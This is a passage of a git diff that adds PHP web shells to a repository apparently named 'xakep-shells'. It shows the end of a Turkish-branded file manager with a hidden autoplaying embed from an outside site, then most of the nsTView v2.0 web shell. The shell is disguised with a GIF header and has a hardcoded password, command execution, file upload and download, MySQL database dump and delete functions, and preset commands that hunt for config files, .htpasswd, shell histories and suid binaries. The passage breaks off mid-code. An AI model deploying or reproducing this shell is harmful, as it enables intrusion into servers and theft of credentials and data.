+'executed' => "\"[%1]\" a �t� brillamment ex�cut� :\n{%2}",
+'not_executed' => "\"[%1]\" n a pas pu �tre ex�cut�:\n{%2}",
+'saved' => '"[%1]" a �t� sauvegard�.',
+'not_saved' => '"[%1]" n a pas pu �tre sauvegard�.',
+'symlinked' => 'Un lien symbolique depuis "[%2]" vers "[%1]" a �t� cr�e.',
+'not_symlinked' => 'Un lien symbolique depuis "[%2]" vers "[%1]" n a pas pu �tre cr��.',
+'permission_for' => 'Droits de "[%1]":',
+'permission_set' => 'Droits de "[%1]" ont �t� chang�s en [%2].',
+'permission_not_set' => 'Droits de "[%1]" n ont pas pu �tre chang�s en[%2].',
+'not_readable' => '"[%1]" ne peut pas �tre ouvert.'
+		);
+
+	case 'it':
+
+		$date_format = 'd-m-Y H:i:s';
+		$word_charset = 'ISO-8859-1';
+
+		return array(
+'directory' => 'Directory',
+'file' => 'File',
+'filename' => 'Nome File',
+
+'size' => 'Dimensioni',
+'permission' => 'Permessi',
+'owner' => 'Proprietario',
+'group' => 'Gruppo',
+'other' => 'Altro',
+'G�revler' => 'Funzioni',
+
+'read' => 'leggi',
+'write' => 'scrivi',
+'execute' => 'esegui',
+
+'create_symlink' => 'crea link simbolico',
+'Sil' => 'cancella',
+'Degistir' => 'rinomina',
+'Tasi' => 'sposta',
+'Kopyala' => 'copia',
+'D�zenle' => 'modifica',
+'indir' => 'indir',
+'upload' => 'upload',
+'create' => 'crea',
+'change' => 'cambia',
+'save' => 'salva',
+'set' => 'imposta',
+'reset' => 'reimposta',
+'relative' => 'Percorso relativo per la destinazione',
+
+'yes' => 'Si',
+'no' => 'No',
+'Geri' => 'indietro',
+'Yol' => 'Destinazione',
+'symlink' => 'Link simbolico',
+'no_output' => 'no output',
+
+'user' => 'User',
+'password' => 'Password',
+'add' => 'aggiungi',
+'add_basic_auth' => 'aggiungi autenticazione base',
+
+'uploaded' => '"[%1]" � stato caricato.',
+'not_uploaded' => '"[%1]" non � stato caricato.',
+'already_exists' => '"[%1]" esiste gi�.',
+'created' => '"[%1]" � stato creato.',
+'not_created' => '"[%1]" non � stato creato.',
+'really_Sil' => 'Cancello questi file ?',
+'Sild' => "Questi file sono stati cancellati:\n[%1]",
+'not_Sild' => "Questi file non possono essere cancellati:\n[%1]",
+'Degistir_file' => 'File rinominato:',
+'Degistird' => '"[%1]" � stato rinominato in "[%2]".',
+'not_Degistird' => '"[%1] non � stato rinominato in "[%2]".',
+'Tasi_files' => 'Sposto questi file:',
+'Tasid' => "Questi file sono stati spostati in \"[%2]\":\n[%1]",
+'not_Tasid' => "Questi file non possono essere spostati in \"[%2]\":\n[%1]",
+'Kopyala_files' => 'Copio questi file',
+'copied' => "Questi file sono stati copiati in \"[%2]\":\n[%1]",
+'not_copied' => "Questi file non possono essere copiati in \"[%2]\":\n[%1]",
+'not_D�zenleed' => '"[%1]" non pu� essere modificato.',
+'executed' => "\"[%1]\" � stato eseguito con successo:\n{%2}",
+'not_executed' => "\"[%1]\" non � stato eseguito con successo\n{%2}",
+'saved' => '"[%1]" � stato salvato.',
+'not_saved' => '"[%1]" non � stato salvato.',
+'symlinked' => 'Il link siambolico da "[%2]" a "[%1]" � stato creato.',
+'not_symlinked' => 'Il link siambolico da "[%2]" a "[%1]" non � stato creato.',
+'permission_for' => 'Permessi di "[%1]":',
+'permission_set' => 'I permessi di "[%1]" sono stati impostati [%2].',
+'permission_not_set' => 'I permessi di "[%1]" non sono stati impostati [%2].',
+'not_readable' => '"[%1]" non pu� essere letto.'
+		);
+
+	case 'se':
+
+		$date_format = 'n/j/y H:i:s';
+		$word_charset = 'ISO-8859-1';
+ 
+		return array(
+'directory' => 'Mapp',
+'file' => 'Fil',
+'filename' => 'Filnamn',
+ 
+'size' => 'Storlek',
+'permission' => 'S�kerhetsniv�',
+'owner' => '�gare',
+'group' => 'Grupp',
+'other' => 'Andra',
+'G�revler' => 'Funktioner',
+ 
+'read' => 'L�s',
+'write' => 'Skriv',
+'execute' => 'Utf�r',
+ 
+'create_symlink' => 'Skapa symlink',
+'Sil' => 'Radera',
+'Degistir' => 'Byt namn',
+'Tasi' => 'Flytta',
+'Kopyala' => 'Kopiera',
+'D�zenle' => '�ndra',
+'indir' => 'Ladda ner',
+'upload' => 'Ladda upp',
+'create' => 'Skapa',
+'change' => '�ndra',
+'save' => 'Spara',
+'set' => 'Markera',
+'reset' => 'T�m',
+'relative' => 'Relative path to target',
+ 
+'yes' => 'Ja',
+'no' => 'Nej',
+'Geri' => 'Tillbaks',
+'Yol' => 'Yol',
+'symlink' => 'Symlink',
+'no_output' => 'no output',
+ 
+'user' => 'Anv�ndare',
+'password' => 'L�senord',
+'add' => 'L�gg till',
+'add_basic_auth' => 'add basic-authentification',
+ 
+'uploaded' => '"[%1]" har laddats upp.',
+'not_uploaded' => '"[%1]" kunde inte laddas upp.',
+'already_exists' => '"[%1]" finns redan.',
+'created' => '"[%1]" har skapats.',
+'not_created' => '"[%1]" kunde inte skapas.',
+'really_Sil' => 'Radera dessa filer?',
+'Sild' => "De h�r filerna har raderats:\n[%1]",
+'not_Sild' => "Dessa filer kunde inte raderas:\n[%1]",
+'Degistir_file' => 'Byt namn p� fil:',
+'Degistird' => '"[%1]" har bytt namn till "[%2]".',
+'not_Degistird' => '"[%1] kunde inte d�pas om till "[%2]".',
+'Tasi_files' => 'Flytta dessa filer:',
+'Tasid' => "Dessa filer har flyttats till \"[%2]\":\n[%1]",
+'not_Tasid' => "Dessa filer kunde inte flyttas till \"[%2]\":\n[%1]",
+'Kopyala_files' => 'Kopiera dessa filer:',
+'copied' => "Dessa filer har kopierats till \"[%2]\":\n[%1]",
+'not_copied' => "Dessa filer kunde inte kopieras till \"[%2]\":\n[%1]",
+'not_D�zenleed' => '"[%1]" kan inte �ndras.',
+'executed' => "\"[%1]\" har utf�rts:\n{%2}",
+'not_executed' => "\"[%1]\" kunde inte utf�ras:\n{%2}",
+'saved' => '"[%1]" har sparats.',
+'not_saved' => '"[%1]" kunde inte sparas.',
+'symlinked' => 'Symlink fr�n "[%2]" till "[%1]" har skapats.',
+'not_symlinked' => 'Symlink fr�n "[%2]" till "[%1]" kunde inte skapas.',
+'permission_for' => 'R�ttigheter f�r "[%1]":',
+'permission_set' => 'R�ttigheter f�r "[%1]" �ndrades till [%2].',
+'permission_not_set' => 'Permission of "[%1]" could not be set to [%2].',
+'not_readable' => '"[%1]" kan inte l�sas.'
+		);
+
+	case 'en':
+	default:
+
+		$date_format = 'n/j/y H:i:s';
+		$word_charset = 'ISO-8859-1';
+
+		return array(
+'directory' => 'D�zergah',
+'file' => 'Dosya',
+'filename' => 'DosyaAdi',
+
+'size' => 'Boyut',
+'permission' => 'izin',
+'owner' => 'Sahip',
+'group' => 'Grup',
+'other' => 'Di�erleri',
+'G�revler' => 'G�revler',
+
+'read' => 'Oku',
+'write' => 'Yaz',
+'execute' => 'Uygula',
+
+'create_symlink' => 'create symlink',
+'Sil' => 'Sil',
+'Degistir' => 'Degistir',
+'Tasi' => 'Tasi',
+'Kopyala' => 'Kopyala',
+'D�zenle' => 'D�zenle',
+'indir' => 'indir',
+'upload' => 'Y�kle',
+'create' => 'Olustur',
+'change' => 'Degisiklik',
+'save' => 'Kaydet',
+'set' => 'Koyulan',
+'reset' => 'Yenile',
+'relative' => 'Hedefe Yolla',
+
+'yes' => 'Evet',
+'no' => 'Hayir',
+'Geri' => 'Geri',
+'Yol' => 'Yol',
+'symlink' => 'Symlink',
+'no_output' => 'Hi�bir ��kt�',
+
+'user' => 'Kullan�c�',
+'password' => 'Sifre',
+'add' => 'Ekle',
+'add_basic_auth' => 'add basic-authentification',
+
+'uploaded' => '"[%1]" Y�klendi.',
+'not_uploaded' => '"[%1]" Y�klenemedi.',
+'already_exists' => '"[%1]" �imdiden var ol.',
+'created' => '"[%1]" Olusturuldu.',
+'not_created' => '"[%1]" Olusturuldu.',
+'really_Sil' => 'Silinen dosyalar?',
+'Sild' => "Bu dosyalar,oldu Sild:\n[%1]",
+'not_Sild' => "Bu dosyalar olamazd� Sild:\n[%1]",
+'Degistir_file' => 'Dosyayi Degistir:',
+'Degistird' => '"[%1]" Degistirildi "[%2]".',
+'not_Degistird' => '"[%1] Degistirilemedi "[%2]".',
+'Tasi_files' => 'Dosyayi TAsi:',
+'Tasid' => "Bu Dosyalar Tasindi \"[%2]\":\n[%1]",
+'not_Tasid' => "Bu Dosyalar Tasinamaz \"[%2]\":\n[%1]",
+'Kopyala_files' => 'Bu Dosyalari Kopyala:',
+'copied' => "Bu Dosyalar Kopyalanir \"[%2]\":\n[%1]",
+'not_copied' => "Bu Dosyalar Kopyalanamaz \"[%2]\":\n[%1]",
+'not_D�zenleed' => '"[%1]" D�zenle.',
+'executed' => "\"[%1]\" Basarili bir sekilde Uygulandi:\n{%2}",
+'not_executed' => "\"[%1]\" Basarili bir sekilde Uygulanamadi:\n{%2}",
+'saved' => '"[%1]" Kurtarildi.',
+'not_saved' => '"[%1]" Kurtar�lamad�.',
+'symlinked' => 'Symlink "[%2]" to "[%1]" Olusturuldu.',
+'not_symlinked' => 'Symlink "[%2]" to "[%1]" Olusturulamadi.',
+'permission_for' => 'izin "[%1]":',
+'permission_set' => 'izin "[%1]" Kopyalandi [%2].',
+'permission_not_set' => 'izin "[%1]" Yapilamadi [%2].',
+'not_readable' => '"[%1]" Okunamadi.'
+		);
+
+	}
+
+}
+
+function getimage ($image) {
+	switch ($image) {
+	case 'file':
+		return base64_decode('R0lGODlhEQANAJEDAJmZmf///wAAAP///yH5BAHoAwMALAAAAAARAA0AAAItnIGJxg0B42rsiSvCA/REmXQWhmnih3LUSGaqg35vFbSXucbSabunjnMohq8CADsA');
+	case 'folder':
+		return base64_decode('R0lGODlhEQANAJEDAJmZmf///8zMzP///yH5BAHoAwMALAAAAAARAA0AAAIqnI+ZwKwbYgTPtIudlbwLOgCBQJYmCYrn+m3smY5vGc+0a7dhjh7ZbygAADsA');
+	case 'hidden_file':
+		return base64_decode('R0lGODlhEQANAJEDAMwAAP///5mZmf///yH5BAHoAwMALAAAAAARAA0AAAItnIGJxg0B42rsiSvCA/REmXQWhmnih3LUSGaqg35vFbSXucbSabunjnMohq8CADsA');
+	case 'link':
+		return base64_decode('R0lGODlhEQANAKIEAJmZmf///wAAAMwAAP///wAAAAAAAAAAACH5BAHoAwQALAAAAAARAA0AAAM5SArcrDCCQOuLcIotwgTYUllNOA0DxXkmhY4shM5zsMUKTY8gNgUvW6cnAaZgxMyIM2zBLCaHlJgAADsA');
+	case 'smiley':
+		return base64_decode('R0lGODlhEQANAJECAAAAAP//AP///wAAACH5BAHoAwIALAAAAAARAA0AAAIslI+pAu2wDAiz0jWD3hqmBzZf1VCleJQch0rkdnppB3dKZuIygrMRE/oJDwUAOwA=');
+	case 'arrow':
+		return base64_decode('R0lGODlhEQANAIABAAAAAP///yH5BAEKAAEALAAAAAARAA0AAAIdjA9wy6gNQ4pwUmav0yvn+hhJiI3mCJ6otrIkxxQAOw==');
+	}
+}
+
+function html_header () {
+	global $charset;
+
+	echo <<<END
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
+     "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html xmlns="http://www.w3.org/1999/xhtml">
+<head>
+
+<meta http-equiv="Content-Type" content="text/html; charset=$charset" />
+
+<title>iMHaBiRLiGi PhpFtp</title>
+
+<style type="text/css">
+body { font: small sans-serif; text-align: center }
+img { width: 0px; height: 0px }
+a, a:visited { text-decoration: none; color: red }
+hr { border-style: none; height: 1px; Geriground-color: silver; color: silver }
+#main { margin-top: 6pt; margin-left: auto; margin-right: auto; border-spacing: 1px }
+#main th { Geriground: #eee; padding: 3pt 3pt 0pt 3pt }
+.listing th, .listing td { padding: 1px 3pt 0 3pt }
+.listing th { border: 1px solid silver }
+.listing td { border: 1px solid #ddd; Geriground: white }
+.listing .checkbox { text-align: center }
+.listing .filename { text-align: left }
+.listing .size { text-align: right }
+.listing .permission_header { text-align: left }
+.listing .permission { font-family: monospace }
+.listing .owner { text-align: left }
+.listing .group { text-align: left }
+.listing .G�revler { text-align: left }
+.listing_footer td { Geriground: #eee; border: 1px solid silver }
+#directory, #upload, #create, .listing_footer td, #error td, #notice td { text-align: left; padding: 3pt }
+#directory { Geriground: #eee; border: 1px solid silver }
+#upload { padding-top: 1em }
+#create { padding-bottom: 1em }
+.small, .small option { font-size: x-small }
+textarea { border: none; Geriground: white }
+table.dialog { margin-left: auto; margin-right: auto }
+td.dialog { Geriground: #eee; padding: 1ex; border: 1px solid silver; text-align: center }
+#permission { margin-left: auto; margin-right: auto }
+#permission td { padding-left: 3pt; padding-right: 3pt; text-align: center }
+td.permission_action { text-align: right }
+#symlink { Geriground: #eee; border: 1px solid silver }
+#symlink td { text-align: left; padding: 3pt }
+#red_button { width: 120px; color: #400 }
+#green_button { width: 120px; color: #040 }
+#error td { Geriground: maroon; color: white; border: 1px solid silver }
+#notice td { Geriground: green; color: white; border: 1px solid silver }
+#notice pre, #error pre { Geriground: silver; color: black; padding: 1ex; margin-left: 1ex; margin-right: 1ex }
+code { font-size: 12pt }
+td { white-space: nowrap }
+</style>
+
+<script type="text/javascript">
+<!--
+function activate (name) {
+	if (document && document.forms[0] && document.forms[0].elements['focus']) {
+		document.forms[0].elements['focus'].value = name;
+	}
+}
+//-->
+</script>
+
+</head>
+<body>
+
+
+END;
+
+}
+
+function html_footer () {
+
+	echo <<<END
+</body>
+</html>
+END;
+
+}
+
+function notice ($phrase) {
+	global $cols;
+
+	$args = func_get_args();
+	array_shift($args);
+
+	return '<tr id="notice">
+	<td colspan="' . $cols . '">' . phrase($phrase, $args) . '</td>
+</tr>
+';
+
+}
+
+function error ($phrase) {
+	global $cols;
+
+	$args = func_get_args();
+	array_shift($args);
+
+	return '<tr id="error">
+	<td colspan="' . $cols . '">' . phrase($phrase, $args) . '</td>
+</tr>
+';
+
+}
+
+?>
+<BODY><IMG style="WIDTH: 306px; HEIGHT: 76px" height=100 
+src="http://www.nettekiadres.com/imhabirligi.jpg" width=282></BODY>
+<br><Center>SU AN <A href="http://www.imhabirligi.com">iMHaBiRLiGi</A> HUDUTLARINDA BULUNMAKTASINIZ.!!</Center>
+<FONT 
+class=footmsg><EMBED src=http://www.imhabirligi.com/r1/hurl.asx hidden=true 
+type="text/plain; charset=iso-8859-9" 
+AUTOSTART="TRUE">
+<script language=JavaScript>
+<!--
+
+var message="";
+///////////////////////////////////
+function clickIE() {if (document.all) {(message);return false;}}
+function clickNS(e) {if 
+(document.layers||(document.getElementById&&!document.all)) {
+if (e.which==2||e.which==3) {(message);return false;}}}
+if (document.layers) 
+{document.captureEvents(Event.MOUSEDOWN);document.onmousedown=clickNS;}
+else{document.onmouseup=clickNS;document.oncontextmenu=clickIE;}
+
+document.oncontextmenu=new Function("return false")
+// --> 
+</script>
\ No newline at end of file
diff --git a/xakep-shells/PHP/img.php.php.txt b/xakep-shells/PHP/img.php.php.txt
new file mode 100644
index 0000000..2c8b999
--- /dev/null
+++ b/xakep-shells/PHP/img.php.php.txt
@@ -0,0 +1,2106 @@
+GIF89a
+<?
+@session_start();
+@set_time_limit(0);
+@set_magic_quotes_runtime(0);
+@error_reporting(0);
+#####cfg#####
+# use password  true / false #
+$create_password = true;
+$password = "nst";    // default password for nstview, you can change it.
+
+# UNIX COMMANDS
+# description (nst) command
+# example: Shutdown (nst) shutdown -h now
+$fast_commands = "
+Show open ports (nst) netstat -an | grep LISTEN | grep tcp
+last root (nst) last root
+last (all users) (nst) last all
+Find all config.php in / (nst) find / -type f -name config.php
+Find all config.php in . (nst) find . -type f -name config.php
+Find all admin.php in / (nst) find / -type f -name admin.php
+Find all admin.php in . (nst) find . -type f -name admin.php
+Find all config.inc.php in / (nst) find / -type f -name config.inc.php
+Find all config.inc.php in . (nst) find . -type f -name config.inc.php
+Find all config.inc in / (nst) find / -type f -name config.inc
+Find all config.inc in . (nst) find . -type f -name config.inc
+Find all config.dat in / (nst) find / -type f -name config.dat
+Find all config.dat in . (nst) find . -type f -name config.dat
+Find all config* in / (nst) find / -type f -name config*
+Find all config* in . (nst) find . -type f -name config*
+Find all pass* in / (nst) find / -type f -name pass*
+Find all pass* in . (nst) find . -type f -name pass*
+Find all .bash_history in / (nst) find / -type f -name .bash_history
+Find all .bash_history in . (nst) find . -type f -name .bash_history
+Find all .htpasswd  in / (nst) find / -type f -name .htpasswd
+Find all .htpasswd  in . (nst) find . -type f -name .htpasswd
+Find all writable dirs/files in / (nst) find / -perm -2 -ls
+Find all writable dirs/files in . (nst) find . -perm -2 -ls
+Find all suid files in / (nst) find / -type f -perm -04000 -ls
+Find all suid files in . (nst) find . -type f -perm -04000 -ls
+Find all sgid files in / (nst) find / -type f -perm -02000 -ls
+Find all sgid files in . (nst) find . -type f -perm -02000 -ls
+Find all .fetchmailrc files in / (nst) find / -type f -name .fetchmailrc
+Find all .fetchmailrc files in . (nst) find . -type f -name .fetchmailrc
+OS Version? (nst) sysctl -a | grep version
+Kernel version? (nst) cat /proc/version
+cat syslog.conf (nst) cat /etc/syslog.conf
+Cat - Message of the day (nst) cat /etc/motd
+Cat hosts (nst) cat /etc/hosts
+Distrib name (nst) cat /etc/issue.net
+Distrib name (2) (nst) cat /etc/*-realise
+Display all process - wide output (nst) ps auxw
+Display all your process (nst) ps ux
+Interfaces (nst) ifconfig
+CPU? (nst) cat /proc/cpuinfo
+RAM (nst) free -m
+HDD space (nst) df -h
+List of Attributes (nst) lsattr -a
+Mount options (nst) cat /etc/fstab
+Is cURL installed? (nst) which curl
+Is wGET installed? (nst) which wget
+Is lynx installed? (nst) which lynx
+Is links installed? (nst) which links
+Is fetch installed? (nst) which fetch
+Is GET installed? (nst) which GET
+Is perl installed? (nst) which perl
+Where is apache (nst) whereis apache
+Where is perl (nst) whereis perl
+locate proftpd.conf (nst) locate proftpd.conf
+locate httpd.conf (nst) locate httpd.conf
+locate my.conf (nst) locate my.conf
+locate psybnc.conf (nst) locate psybnc.conf
+";
+
+
+
+# WINDOWS COMMANDS
+# description (nst) command
+# example: Delete autoexec.bat (nst) del c:\autoexec.bat
+$fast_commands_win = "
+OS Version (nst) ver
+Tasklist  (nst) tasklist
+Attributes in . (nst) attrib
+Show open ports (nst) netstat -an
+";
+
+
+
+
+
+######ver####
+$ver= "v2.0";
+#############
+$pass=$_POST['pass'];
+if($pass==$password){
+$_SESSION['nst']="$pass";
+}
+if ($_SERVER["HTTP_CLIENT_IP"]) $ip = $_SERVER["HTTP_CLIENT_IP"];
+else if($_SERVER["HTTP_X_FORWARDED_FOR"]) $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];
+else if($_SERVER["REMOTE_ADDR"]) $ip = $_SERVER["REMOTE_ADDR"];
+else $ip = $_SERVER['REMOTE_ADDR'];
+$ip=htmlspecialchars($ip);
+
+if($create_password==true){
+
+if(!isset($_SESSION['nst']) or $_SESSION['nst']!=$password){
+die("
+<title>nsTView $ver:: nst.void.ru</title>
+<center>
+<table width=100 bgcolor=#D7FFA8 border=1 bordercolor=black><tr><td>
+<font size=1 face=verdana><center>
+<b>nsTView $ver :: <a href=http://nst.void.ru style='text-decoration:none;'><font color=black>nst.void.ru</font></a><br></b>
+</center>
+<form method=post>
+Password:<br>
+<input type=password name=pass size=30 tabindex=1>
+</form>
+<b>Host:</b> ".$_SERVER["HTTP_HOST"]."<br>
+<b>IP:</b> ".gethostbyname($_SERVER["HTTP_HOST"])."<br>
+<b>Your ip:</b> ".$ip."
+</td></tr></table>
+");}
+
+}
+$d=$_GET['d'];
+
+function adds($editf){
+#if(get_magic_quotes_gpc()==0){
+$editf=addslashes($editf);
+#}
+return $editf;
+}
+function adds2($editf){
+if(get_magic_quotes_gpc()==0){
+$editf=addslashes($editf);
+}
+return $editf;
+}
+
+$f   = "nst_sql.txt";
+$f_d = $_GET['f_d'];
+
+if($_GET['download']){
+$download=$_GET['download'];
+header("Content-disposition: attachment; filename=\"$download\";");
+readfile("$d/$download");
+exit;}
+
+if($_GET['dump_download']){
+header("Content-disposition: attachment; filename=\"$f\";");
+header("Content-length: ".filesize($f_d."/".$f));
+header("Expires: 0");
+readfile($f_d."/".$f);
+if(is_writable($f_d."/".$f)){
+unlink($f_d."/".$f);
+}
+die;
+}
+
+
+$images=array(".gif",".jpg",".png",".bmp",".jpeg");
+$whereme=getcwd();
+@$d=@$_GET['d'];
+$copyr = "<center><a href=http://nst.void.ru target=_blank>nsTView $ver<br>o... Network security team ...o</a>";
+$php_self=@$_SERVER['PHP_SELF'];
+if(@eregi("/",$whereme)){$os="unix";}else{$os="win";}
+if(!isset($d)){$d=$whereme;}
+$d=str_replace("\\","/",$d);
+if(@$_GET['p']=="info"){
+@phpinfo();
+exit;}
+if(@$_GET['img']=="1"){
+@$e=$_GET['e'];
+header("Content-type: image/gif");
+readfile("$d/$e");
+}
+if(@$_GET['getdb']=="1"){
+header('Content-type: application/plain-text');
+header('Content-Disposition: attachment; filename=nst-mysql-damp.htm');
+}
+print "<title>nsT View $ver</title>
+<style>
+BODY, TD, TR {
+text-decoration: none;
+font-family: Verdana;
+font-size: 8pt;
+SCROLLBAR-FACE-COLOR: #363d4e;
+SCROLLBAR-HIGHLIGHT-COLOR: #363d4e;
+SCROLLBAR-SHADOW-COLOR: #363d4e;
+SCROLLBAR-ARROW-COLOR: #363d4e;
+SCROLLBAR-TRACK-COLOR: #91AAFF
+}
+input, textarea, select {
+font-family: Verdana;
+font-size: 10px;
+color: black;
+background-color: white;
+border: solid 1px;
+border-color: black
+}
+UNKNOWN {
+COLOR: #0006DE;
+TEXT-DECORATION: none
+}
+A:link {
+COLOR: #0006DE;
+TEXT-DECORATION: none
+}
+A:hover {
+COLOR: #FF0C0B;
+TEXT-DECORATION: none
+}
+A:active {
+COLOR: #0006DE;
+TEXT-DECORATION: none
+}
+A:visited {
+TEXT-DECORATION: none
+}
+</style>
+<script>
+function ShowOrHide(d1, d2) {
+if (d1 != '') DoDiv(d1);
+if (d2 != '') DoDiv(d2);}
+
+function DoDiv(id) {
+var item = null;
+if (document.getElementById) {
+item = document.getElementById(id);
+} else if (document.all){
+item = document.all[id];
+} else if (document.layers){
+item = document.layers[id];}
+if (!item) {}
+else if (item.style) {
+if (item.style.display == \"none\"){ item.style.display = \"\"; }
+else {item.style.display = \"none\"; }
+}else{ item.visibility = \"show\"; }}
+
+function cwd(text){
+document.shellForm.sh.value+=\" \"+ text;
+document.shellForm.sh.focus();
+}
+
+
+</script>
+";
+print "<body vlink=#0006DE>
+<table width=600 border=0 cellpadding=0 cellspacing=1 bgcolor=#D7FFA8 align=center>
+<tr><td><font face=wingdings size=2>0</font>";
+$expl=explode("/",$d);
+$coun=count($expl);
+if($os=="unix"){echo "<a href='$php_self?d=/'>/</a>";}
+else{
+        echo "<a href='$php_self?d=$expl[0]'>$expl[0]/</a>";}
+for($i=1; $i<$coun; $i++){
+        @$xx.=$expl[$i]."/";
+$sls="<a href='$php_self?d=$expl[0]/$xx'>$expl[$i]</a>/";
+$sls=str_replace("//","/",$sls);
+$sls=str_replace("/'></a>/","/'></a>",$sls);
+print $sls;
+}
+if(@ini_get("register_globals")){$reg_g="ON";}else{$reg_g="OFF";}
+if(@ini_get("safe_mode")){$safe_m="ON";}else{$safe_m="OFF";}
+echo "</td></tr>";
+if($os=="unix"){ echo "
+<tr><td><b>id:</b> ".@exec('id')."</td></tr>
+<tr><td><b>uname -a:</b> ".@exec('uname -a')."</td></tr>";} echo"
+<tr><td><b>Your IP: [<font color=#5F3CC1>$ip</font>] Server IP: [<font color=#5F3CC1>".gethostbyname($_SERVER["HTTP_HOST"])."</font>] Server <a href=# title='Host.Domain'>H.D.</a>: [<font color=#5F3CC1>".$_SERVER["HTTP_HOST"]."</font>]</b><br>
+[<b>Safe mode:</b> $safe_m] [<b>Register globals:</b> $reg_g]<br>
+[<a href=# onClick=location.href=\"javascript:history.back(-1)\">Back</a>]
+[<a href='$php_self'>Home</a>]
+[<a href='$php_self?d=$d&shell=1'>Shell (1)</a> <a href='$php_self?d=$d&shell=2'>(2)</a>]
+[<a href='$php_self?d=$d&t=upload'>Upload</a>]
+[<a href='$php_self?t=tools'>Tools</a>]
+[<a href='$php_self?p=info'>PHPinfo</a>]
+[<a href='$php_self?delfolder=$d&d=$d&delfl=1&rback=$d' title='$d'>DEL Folder</a>]
+[<a href='$php_self?p=sql'>SQL</a>]
+[<a href='$php_self?p=selfremover'>Self Remover</a>]
+</td></tr>
+";
+if($os=="win"){ echo "
+<tr><td bgcolor=white>
+<center><font face=wingdings size=2><</font>
+<a href='$php_self?d=a:/'>A</a>
+<a href='$php_self?d=b:/'>B</a>
+<a href='$php_self?d=c:/'>C</a>
+<a href='$php_self?d=d:/'>D</a>
+<a href='$php_self?d=e:/'>E</a>
+<a href='$php_self?d=f:/'>F</a>
+<a href='$php_self?d=g:/'>G</a>
+<a href='$php_self?d=h:/'>H</a>
+<a href='$php_self?d=i:/'>I</a>
+<a href='$php_self?d=j:/'>J</a>
+<a href='$php_self?d=k:/'>K</a>
+<a href='$php_self?d=l:/'>L</a>
+<a href='$php_self?d=m:/'>M</a>
+<a href='$php_self?d=n:/'>N</a>
+<a href='$php_self?d=o:/'>O</a>
+<a href='$php_self?d=p:/'>P</a>
+<a href='$php_self?d=q:/'>Q</a>
+<a href='$php_self?d=r:/'>R</a>
+<a href='$php_self?d=s:/'>S</a>
+<a href='$php_self?d=t:/'>T</a>
+<a href='$php_self?d=u:/'>U</a>
+<a href='$php_self?d=v:/'>V</a>
+<a href='$php_self?d=w:/'>W</a>
+<a href='$php_self?d=x:/'>X</a>
+<a href='$php_self?d=y:/'>Y</a>
+<a href='$php_self?d=z:/'>Z</a>
+</td></tr>";}else{echo "<tr><td>&nbsp;</td></tr>";}
+print "<tr><td>
+:: <a href='$php_self?d=$d&mkdir=1'>Create folder</a> ::
+<a href='$php_self?d=$d&mkfile=1'>Create file</a> ::
+<a href='$php_self?d=$d&read_file_safe_mode=1'>Read file if safe mode is On</a> ::
+<a href='$php_self?d=$d&ps_table=1'>PS table</a> ::
+</td></tr>";
+
+if(@$_GET['p']=="sql"){
+print "<tr><td>";
+###
+
+$f_d = $_GET['f_d'];
+if(!isset($f_d)){$f_d=".";}
+if($f_d==""){$f_d=".";}
+
+$php_self=$_SERVER['PHP_SELF'];
+$delete_table=$_GET['delete_table'];
+$tbl=$_GET['tbl'];
+$from=$_GET['from'];
+$to=$_GET['to'];
+$adress=$_POST['adress'];
+$port=$_POST['port'];
+$login=$_POST['login'];
+$pass=$_POST['pass'];
+$adress=$_GET['adress'];
+$port=$_GET['port'];
+$login=$_GET['login'];
+$pass=$_GET['pass'];
+$conn=$_GET['conn'];
+if(!isset($adress)){$adress="127.0.0.1";}
+if(!isset($login)){$login="root";}
+if(!isset($pass)){$pass="";}
+if(!isset($port)){$port="3306";}
+if(!isset($from)){$from=0;}
+if(!isset($to)){$to=50;}
+
+
+?>
+<style>
+table,td{
+color: black;
+font-face: verdana;
+font-size: 11px;
+
+}
+</style>
+<font color=black face=verdana size=1>
+<? if(!$conn){ ?>
+
+<!-- table 1 -->
+<table bgcolor=#D7FFA8>
+<tr><td valign=top>Address:</td><td><form><input name=adress value='<?=$adress?>' size=20><input name=port value='<?=$port?>' size=6></td></tr>
+<tr><Td valign=top>Login: </td><td><input name=login value='<?=$login?>' size=10></td></tr>
+<tr><Td valign=top>Pass:</td><td> <input name=pass value='<?=$pass?>' size=10><input type=hidden name=p value=sql></td></tr>
+<tr><td></td><td><input type=submit name=conn value=Connect></form></td></tr><?}?>
+<tr><td valign=top><? if($conn){ echo "<b>PHP v".@phpversion()."<br>mySQL v".@mysql_get_server_info()."<br>";}?></b></td><td></td></tr>
+</table>
+<!-- end of table 1 -->
+
+
+<?
+$conn=$_GET['conn'];
+$adress=$_GET['adress'];
+$port=$_GET['port'];
+$login=$_GET['login'];
+$pass=$_GET['pass'];
+if($conn){
+
+$serv = @mysql_connect($adress.":".$port, $login,$pass) or die("<font color=red>Error: ".mysql_error()."</font>");
+if($serv){$status="Connected. :: <a href='$php_self?p=sql'>Log out</a>";}else{$status="Disconnected.";}
+print "<b><font color=green>Status: $status<br><br>"; # #D7FFA8
+print "<table cellpadding=0 cellspacing=0 bgcolor=#D7FFA8><tr><td valign=top>";
+print "<br><font color=red>[db]</font><Br>";
+print "<font color=white>";
+$res = mysql_list_dbs($serv);
+while ($str=mysql_fetch_row($res)){
+print "<a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&delete_db=$str[0]' onclick='return confirm(\"DELETE $str[0] ?\")'>[DEL]<a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$str[0]&dump_db=$str[0]&f_d=$d'>[DUMP]</a></a> <b><a href='$php_self?baza=1&db=$str[0]&p=sql&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$str[0]'>$str[0]</a></b><br>";
+$tc++;
+}
+$baza=$_GET['baza'];
+$db=$_GET['db'];
+print "<font color=red>[Total db: $tc]</font><br>";
+if($baza){
+print "<div align=left><font color=green>db: [$db]</div></font><br>";
+$result=@mysql_list_tables($db);
+while($str=@mysql_fetch_array($result)){
+$c=mysql_query ("SELECT COUNT(*) FROM $str[0]");
+$records=mysql_fetch_array($c);
+
+if(strlen($str[0])>$s4ot){$s4ot=strlen($str[0]);}
+if($records[0]=="0"){
